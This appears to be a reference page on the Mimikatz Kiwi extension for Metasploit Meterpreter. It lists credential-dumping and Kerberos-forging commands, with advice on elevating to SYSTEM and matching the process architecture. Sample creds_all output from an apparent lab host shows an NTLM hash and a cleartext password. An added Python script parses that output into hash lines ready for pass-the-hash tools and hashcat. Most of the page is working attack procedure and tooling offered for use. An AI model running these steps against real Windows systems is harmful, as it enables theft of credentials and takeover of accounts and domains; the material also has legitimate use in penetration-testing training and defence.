Mimikatz Kiwi

Description

Mimikatz is a well-known tool for extracting plaintext passwords, password hashes, PIN codes and Kerberos tickets from memory, chiefly from the LSASS process. It can also perform pass-the-hash and pass-the-ticket and build Golden Tickets. Kiwi is the Meterpreter extension that embeds mimikatz in a Metasploit session, so the same functions can be driven from the `meterpreter >` prompt without dropping a separate binary on disk.

Platform: Windows
Author: gentilkiwi (Benjamin DELPY)
License: Creative Commons 4.0
URL: https://blog.gentilkiwi.com/mimikatz

Usage

Kiwi Commands
=============
 
    Command                Description
    -------                -----------
    creds_all              Retrieve all credentials (parsed)
    creds_kerberos         Retrieve Kerberos creds (parsed)
    creds_livessp          Retrieve Live SSP creds
    creds_msv              Retrieve LM/NTLM creds (parsed)
    creds_ssp              Retrieve SSP creds
    creds_tspkg            Retrieve TsPkg creds (parsed)
    creds_wdigest          Retrieve WDigest creds (parsed)
    dcsync                 Retrieve user account information via DCSync (unparsed)
    dcsync_ntlm            Retrieve user account NTLM hash, SID and RID via DCSync
    golden_ticket_create   Create a golden kerberos ticket
    kerberos_ticket_list   List all kerberos tickets (unparsed)
    kerberos_ticket_purge  Purge any in-use kerberos tickets
    kerberos_ticket_use    Use a kerberos ticket
    kiwi_cmd               Execute an arbitrary mimikatz command (unparsed)
    lsa_dump_sam           Dump LSA SAM (unparsed)
    lsa_dump_secrets       Dump LSA secrets (unparsed)
    password_change        Change the password/hash of a user
    wifi_list              List wifi profiles/creds for the current user
    wifi_list_shared       List shared wifi profiles/creds (requires SYSTEM)

Examples

load kiwi

Loads the kiwi extension into the current Meterpreter session; the banner that follows is mimikatz's own. The extension must match the architecture of the session it runs in: on 64-bit Windows, load it from a 64-bit Meterpreter (migrate into a 64-bit process first if the session is 32-bit; Metasploit prints a warning when an x86 kiwi is loaded on an x64 host). Most kiwi commands read LSASS memory and therefore need SYSTEM or SeDebugPrivilege, so elevate (for example with `getsystem`) before running them.

meterpreter > load kiwi
Loading extension kiwi...
  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX            ( vincent.letoux@gmail.com )
  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/
 
Success.
creds_all

Runs the providers behind the `creds_*` commands above in one go and prints whatever LSASS currently holds for each logged-on account. It needs SYSTEM or SeDebugPrivilege; the `[+] Running as SYSTEM` line confirms that check passed. `(null)` entries are normal rather than a failure: a provider only shows a cleartext password when that authentication package cached one. In particular, wdigest no longer caches cleartext by default since Windows 8.1 / Server 2012 R2 (older versions need KB2871997 plus `UseLogonCredential` set to 0 to get the same behaviour), while the msv provider still yields the NTLM hash, which is sufficient for pass-the-hash.

meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============
 
Username  Domain         NTLM                              SHA1
--------  ------         ----                              ----
sec       SECSTUDENT     396f460962c665bc648db299d55f1ba2  4029ce95b7a89f3c63148d94e789c0350e069ef4
 
wdigest credentials
===================
 
Username        Domain         Password
--------        ------         --------
(null)          (null)         (null)
SECSTUDENT$     SEC            (null)
sec             SECSTUDENT     (null)
 
kerberos credentials
====================
 
Username        Domain         Password
--------        ------         --------
(null)          (null)         (null)
sec             SEC            sec123
secstudent$     SEC            (null)

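The tables creds_all prints are aligned text rather than a machine-readable format, so they usually end up pasted into notes and re-typed into other tools. The following is an added example, not part of Metasploit or mimikatz, that parses the creds_all output shown above (embedded here as a constructed sample with the same column widths) into records: it slices columns by the offsets of the `----` underline row so a password containing spaces survives intact, drops the `(null)` placeholder rows, and emits the NT hashes as `DOMAIN\user:hash` lines ready for pass-the-hash tooling or hashcat mode 1000. The function names are my own.

```python
import re
from collections import defaultdict

# Constructed sample: the creds_all output reproduced from the page above.
SAMPLE_CREDS_ALL = """\
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============

Username  Domain         NTLM                              SHA1
--------  ------         ----                              ----
sec       SECSTUDENT     396f460962c665bc648db299d55f1ba2  4029ce95b7a89f3c63148d94e789c0350e069ef4

wdigest credentials
===================

Username        Domain         Password
--------        ------         --------
(null)          (null)         (null)
SECSTUDENT$     SEC            (null)
sec             SECSTUDENT     (null)

kerberos credentials
====================

Username        Domain         Password
--------        ------         --------
(null)          (null)         (null)
sec             SEC            sec123
secstudent$     SEC            (null)
"""

PROVIDER_RE = re.compile(r"^(\w+) credentials$")   # e.g. "msv credentials"


def running_as_system(output):
    """True when kiwi printed its '[+] Running as SYSTEM' check; without
    SYSTEM or SeDebugPrivilege the provider tables come back empty."""
    return "[+] Running as SYSTEM" in output


def _column_bounds(dash_line):
    """Each '----' run marks a column start; a column extends to the next
    start, so a value containing spaces (a password) is not split."""
    starts = [m.start() for m in re.finditer(r"-+", dash_line)]
    return [(s, starts[i + 1] if i + 1 < len(starts) else None)
            for i, s in enumerate(starts)]


def parse_creds_all(output):
    """Return {provider: [{column: value, ...}, ...]}. Placeholder rows (a
    (null) username, or every credential column (null)) are dropped, so a
    provider that held nothing usable is simply absent from the result."""
    creds = defaultdict(list)
    provider = header_line = bounds = headers = None
    for line in output.splitlines():
        line = line.rstrip()
        m = PROVIDER_RE.match(line)
        if m:
            provider, header_line, bounds = m.group(1), None, None
            continue
        if provider is None or not line.strip() or set(line.strip()) == {"="}:
            continue                      # preamble, blank line, or ==== underline
        if header_line is None:           # "Username  Domain  NTLM  SHA1"
            header_line = line
            continue
        if bounds is None:                # "--------  ------  ----  ----"
            if set(line.strip()) <= {"-", " "}:
                bounds = _column_bounds(line)
                headers = [header_line[s:e].strip() for s, e in bounds]
            continue
        record = dict(zip(headers, [line[s:e].strip() for s, e in bounds]))
        if record.get("Username") in ("", "(null)"):
            continue
        cred_values = [v for k, v in record.items() if k not in ("Username", "Domain")]
        if cred_values and all(v == "(null)" for v in cred_values):
            continue
        creds[provider].append(record)
    return dict(creds)


def ntlm_hashes(creds):
    """'DOMAIN\\user:nthash' lines from the msv provider; the bare 32-hex NT
    hash is what pass-the-hash tooling and hashcat -m 1000 consume."""
    lines = set()
    for rec in creds.get("msv", []):
        nt = rec.get("NTLM", "")
        if re.fullmatch(r"[0-9a-fA-F]{32}", nt):
            lines.add(f"{rec['Domain']}\\{rec['Username']}:{nt.lower()}")
    return sorted(lines)


def cleartext_passwords(creds):
    """{(domain, user): password} from every provider with a Password column."""
    found = {}
    for records in creds.values():
        for rec in records:
            pw = rec.get("Password")
            if pw and pw != "(null)":
                found[(rec["Domain"], rec["Username"])] = pw
    return found


if __name__ == "__main__":
    parsed = parse_creds_all(SAMPLE_CREDS_ALL)
    print("SYSTEM:", running_as_system(SAMPLE_CREDS_ALL))
    for h in ntlm_hashes(parsed):
        print("NTLM", h)
    for (dom, user), pw in cleartext_passwords(parsed).items():
        print("PASS", f"{dom}\\{user}:{pw}")
```

On the sample above this yields one NT hash (`SECSTUDENT\sec`) and one cleartext password (`SEC\sec`); the wdigest table disappears entirely because all of its rows were `(null)`, which is exactly what you would expect from a host where WDigest caching is disabled. Column slicing by the underline row is deliberate: splitting on whitespace would break on the first Kerberos password that contains a space.
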
Blog Posts